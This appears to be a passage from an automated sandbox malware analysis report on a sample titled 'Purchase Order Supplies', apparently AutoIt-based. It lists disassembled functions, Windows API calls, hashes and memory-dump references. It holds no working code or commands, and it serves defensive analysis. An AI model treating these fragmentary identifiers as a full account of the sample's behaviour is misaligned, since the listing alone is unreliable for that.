                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                          • String ID:
                          • API String ID: 1946975507-0
                          • Opcode ID: 6a494ff3daec9cd65f902a12dc1a6becfa502ee92a6a2d63d2dade275e2ed491
                          • Instruction ID: 0be12c2d2b709a717949c543bfbe23232e75aef601e9c4c7f64f1bf3b5ea348d
                          • Opcode Fuzzy Hash: 6a494ff3daec9cd65f902a12dc1a6becfa502ee92a6a2d63d2dade275e2ed491
                          • Instruction Fuzzy Hash: B1E0ED31500340BEEB215F74AC497D87F22AB56335F14C266F779980E6CB724982DB31
                          Function 00D0C0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          • API String ID: 2889604237-0
                          • Opcode ID: 494aad42cd98c55be68c744929e2130f569e3852926e0caf977a45b70d011c91
                          • Instruction ID: c73d81c241dbb006458d141340267b1930c752cac36e00b7c2541c56c95993d5
                          • Opcode Fuzzy Hash: 494aad42cd98c55be68c744929e2130f569e3852926e0caf977a45b70d011c91
                          • Instruction Fuzzy Hash: 00E01AB1500304EFDB005F7088486A93BA6EB4C354F11C405F84AC7350DF7998829B60
                          Function 00D0C0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          • API String ID: 2889604237-0
                          • Opcode ID: 37e1657ce8a3ec24b4f0adff67f6d78cc52f31a4d201d3c64e3585942ef5a211
                          • Instruction ID: 7773a1dbc406f608e44c7af6961e7afec4ea05fbfbf6821209249e588fe28da3
                          • Opcode Fuzzy Hash: 37e1657ce8a3ec24b4f0adff67f6d78cc52f31a4d201d3c64e3585942ef5a211
                          • Instruction Fuzzy Hash: D6E012B1900308AFDB009FB088486A93BAAEB4D364F11C405F94ACB310DFB899829B60
                          Function 00D12350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID: >$DEFINE
                          • API String ID: 4104443479-1664449232
                          • Opcode ID: 4b557098af3811317b09593fa9bea8ea12ec19ada02d6cfcc9a6b789da6917e6
                          • Instruction ID: ad7182446e4676d111e5de963986c0d17d349547f32cc45465bb69ac28d9ee46
                          • Opcode Fuzzy Hash: 4b557098af3811317b09593fa9bea8ea12ec19ada02d6cfcc9a6b789da6917e6
                          • Instruction Fuzzy Hash: CC124A75A0020AEFCF24CF58D4846EDB7B1FF58314F19825AE855AB391DB31AE91CB60
                          Function 00CCEAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                          Download Yara Rule
                          APIs
                          • OleSetContainedObject.OLE32(?,00000001), ref: 00CCECA0
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ContainedObject
                          • String ID: AutoIt3GUI$Container
                          • API String ID: 3565006973-3941886329
                          • Opcode ID: 3c18fde488a4c750dc81ceaf51a2367a971c3d1f5654dace58ec1ff5aaaf45c4
                          • Instruction ID: d7b15de1d2745c2cc9429d7aaa318c4e53772d84e5bf1ca48d105c3772456967
                          • Opcode Fuzzy Hash: 3c18fde488a4c750dc81ceaf51a2367a971c3d1f5654dace58ec1ff5aaaf45c4
                          • Instruction Fuzzy Hash: 43913774600701AFDB14CF68C884F6ABBB9BF49710F24856DF95ACB291DB70E941CB60
                          Function 00CDE704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C93BCF: _wcscpy.LIBCMT ref: 00C93BF2
                            • Part of subcall function 00C984A6: __swprintf.LIBCMT ref: 00C984E5
                            • Part of subcall function 00C984A6: __itow.LIBCMT ref: 00C98519
                          • __wcsnicmp.LIBCMT ref: 00CDE785
                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00CDE84E
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                          • String ID: LPT
                          • API String ID: 3222508074-1350329615
                          • Opcode ID: a5202bbbb75a81660815d8193d7da713b50b0223ee66b1a9eb401e4cc136c889
                          • Instruction ID: e4f700c228160096241c796af71f452649ae2719028e742e50453df26bf04709
                          • Opcode Fuzzy Hash: a5202bbbb75a81660815d8193d7da713b50b0223ee66b1a9eb401e4cc136c889
                          • Instruction Fuzzy Hash: B6617D75A00215AFCB14EB98C895EAEB7F8EF09310F05406AF656AF390DB30AE44DB50
                          Function 00C91B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNEL32(00000000), ref: 00C91B83
                          • GlobalMemoryStatusEx.KERNEL32 ref: 00C91B9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: GlobalMemorySleepStatus
                          • String ID: @
                          • API String ID: 2783356886-2766056989
                          • Opcode ID: 48f306267383ef08b9fa9b3a7bc5ca6bba2aeaa4993981b7b07bcddb4ef722ca
                          • Instruction ID: 9e179ae402925f9f6b07f82dd07635810cc2d0ce4da8c95d7abc1a90855bcbbc
                          • Opcode Fuzzy Hash: 48f306267383ef08b9fa9b3a7bc5ca6bba2aeaa4993981b7b07bcddb4ef722ca
                          • Instruction Fuzzy Hash: E6515A71408745ABE720AF14D885BABBBECFF9A354F41484DF1C8811A1EB71956CC763
                          Function 00CDCE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C9417D: __fread_nolock.LIBCMT ref: 00C9419B
                          • _wcscmp.LIBCMT ref: 00CDCF49
                          • _wcscmp.LIBCMT ref: 00CDCF5C
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _wcscmp$__fread_nolock
                          • String ID: FILE
                          • API String ID: 4029003684-3121273764
                          • Opcode ID: 201b3317705bc1de66f11dfab7b25a3164e0f3a500fef85b64d101b665a23ccb
                          • Instruction ID: f9168545545a5d7b7eb5be9789ea371ef5edaaae270c461faa5c43b727214a95
                          • Opcode Fuzzy Hash: 201b3317705bc1de66f11dfab7b25a3164e0f3a500fef85b64d101b665a23ccb
                          • Instruction Fuzzy Hash: 2841E232A0421ABADF109BA4CC85FEF7BBA9F49710F00046AF601E7281D7719A45DB61
                          Function 00CFA578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00CFA668
                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CFA67D
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: '
                          • API String ID: 3850602802-1997036262
                          • Opcode ID: 00b6dba6a5f2777c4524e9dabb615ca9ccc281f9798ada92cf24bdb0bc267ef1
                          • Instruction ID: cdf027dd9fa7a3a8e9885cd545985e11d6f83f51866122d9566cff134b3cbd75
                          • Opcode Fuzzy Hash: 00b6dba6a5f2777c4524e9dabb615ca9ccc281f9798ada92cf24bdb0bc267ef1
                          • Instruction Fuzzy Hash: 0A4109B5A00309AFDB54CF65C880BEABBB5FF09300F140469EA19DB341D770A941CFA1
                          Function 00CE57D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00CE57E7
                          • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00CE581D
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CrackInternet_memset
                          • String ID: |
                          • API String ID: 1413715105-2343686810
                          • Opcode ID: afeb04ecb01acd06915cd01ee097cd08cbb2503e714a6a058705cc191969ea80
                          • Instruction ID: 38f1c261dcb04bbcf70da6b6c23580d5aa9440584d3131990d5bd50f8bf9ec11
                          • Opcode Fuzzy Hash: afeb04ecb01acd06915cd01ee097cd08cbb2503e714a6a058705cc191969ea80
                          • Instruction Fuzzy Hash: 17311C71C00119EBCF11AFA1DC95EEE7FB9FF19314F104019F816A6162DB319A4ADB60
                          Function 00CF9567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(?,?,?,?), ref: 00CF961B
                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00CF9657
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$DestroyMove
                          • String ID: static
                          • API String ID: 2139405536-2160076837
                          • Opcode ID: 6135131fd55eabf5403ed25b79b9ecd0e7d8a61137b1e9fe0f9691149f01df3d
                          • Instruction ID: ac67d8e161d6f54aeb170b38759b029471a3f7e74a4104c8c7662a11830d5ea4
                          • Opcode Fuzzy Hash: 6135131fd55eabf5403ed25b79b9ecd0e7d8a61137b1e9fe0f9691149f01df3d
                          • Instruction Fuzzy Hash: A5318B31500608AEEF509F68DC80BFB77A9FF59764F108619FAA9C7190CA31AD81DB61
                          Function 00CD5B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00CD5BE4
                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CD5C1F
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: InfoItemMenu_memset
                          • String ID: 0
                          • API String ID: 2223754486-4108050209
                          • Opcode ID: daa1ab2269628ef3d6d2a2d5a74e1d3086deb5bd96e474a5161917cc72e5bf74
                          • Instruction ID: bf8a4d0c54da406216a38c3686b4fee7e386f463a2e4ed2706da9425fbb5f14c
                          • Opcode Fuzzy Hash: daa1ab2269628ef3d6d2a2d5a74e1d3086deb5bd96e474a5161917cc72e5bf74
                          • Instruction Fuzzy Hash: 8C31B931610705AFEB25DF99C985BEEBBF5EF49350F18001AEA91962A0E7B09B44DF10
                          Function 00CE6B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                          Download Yara Rule
                          APIs
                          • __snwprintf.LIBCMT ref: 00CE6BDD
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: __snwprintf_memmove
                          • String ID: , $$AUTOITCALLVARIABLE%d
                          • API String ID: 3506404897-2584243854
                          • Opcode ID: 74e43ba97b93533f5a1bc8ba6fb9448b9902aca654c19048b445a11c5f36c2a4
                          • Instruction ID: 2d19f4e27b215dd818b3f4427cbc6ca3ddc62f3d9d3801a9906786b791860959
                          • Opcode Fuzzy Hash: 74e43ba97b93533f5a1bc8ba6fb9448b9902aca654c19048b445a11c5f36c2a4
                          • Instruction Fuzzy Hash: 65218031600218AFCF10EFA9DC86EAE77B5EF54740F204465F545AB281DB70EE46EBA1
                          Function 00CF91DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CF9269
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CF9274
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: Combobox
                          • API String ID: 3850602802-2096851135
                          • Opcode ID: 6be4425274d5cdbcfb07fc1a8055c4e6fd82df18cdb75dfa112dd54c6fabba3e
                          • Instruction ID: 72e41ba5d3d6815b8fdae14a480f0fd59f038e9089ae40466bb9c69a0430caeb
                          • Opcode Fuzzy Hash: 6be4425274d5cdbcfb07fc1a8055c4e6fd82df18cdb75dfa112dd54c6fabba3e
                          • Instruction Fuzzy Hash: DA11B27170020DBFEF61CE54DC80FBB376AEB893A4F104125FA2897290D631DD519BA1
                          Function 00CF970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00CAC657
                            • Part of subcall function 00CAC619: GetStockObject.GDI32(00000011), ref: 00CAC66B
                            • Part of subcall function 00CAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CAC675
                          • GetWindowRect.USER32(00000000,?), ref: 00CF9775
                          • GetSysColor.USER32(00000012), ref: 00CF978F
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                          • String ID: static
                          • API String ID: 1983116058-2160076837
                          • Opcode ID: bea6d3e5df5528efb9295c1902089ee60def25476726484a1a1ffa5399407f06
                          • Instruction ID: 4c34358da43f1249d0bca4e8407f17c407330e3ae46f5315cfb02a1ab36e639a
                          • Opcode Fuzzy Hash: bea6d3e5df5528efb9295c1902089ee60def25476726484a1a1ffa5399407f06
                          • Instruction Fuzzy Hash: 4D112676520209AFDF04EFB8C845EFA7BB8EB08314F004629FA56E3250E735E851DB60
                          Function 00CF9424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetWindowTextLengthW.USER32(00000000), ref: 00CF94A6
                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00CF94B5
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: LengthMessageSendTextWindow
                          • String ID: edit
                          • API String ID: 2978978980-2167791130
                          • Opcode ID: 5f2f0603cd9a2ac48ca6b5f5a2dc7c4d5a3ba5a872c2983d67cb506e388cb4af
                          • Instruction ID: 2813af85afb775f2fcd9adb37171812495349567415a28648080896a1412fdd8
                          • Opcode Fuzzy Hash: 5f2f0603cd9a2ac48ca6b5f5a2dc7c4d5a3ba5a872c2983d67cb506e388cb4af
                          • Instruction Fuzzy Hash: 84115B72500208AEEF508E649C80FFB3B6AEB25378F104724FA75931E0C771DC52AB62
                          Function 00CD5C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00CD5CF3
                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00CD5D12
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: InfoItemMenu_memset
                          • String ID: 0
                          • API String ID: 2223754486-4108050209
                          • Opcode ID: ce64e0aed953db064d122df054885f631abc51fd9a871e5ebf31a61c2068da6d
                          • Instruction ID: e964b67003fc94fbdfd121d465bb74615889c2fd7695f02308d7efd7e4a08318
                          • Opcode Fuzzy Hash: ce64e0aed953db064d122df054885f631abc51fd9a871e5ebf31a61c2068da6d
                          • Instruction Fuzzy Hash: 25119371D11628ABDB20DB58D948B9A77FA9B4A344F180013EE51EB390D7709E05C7A1
                          Function 00CE53F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                          Download Yara Rule
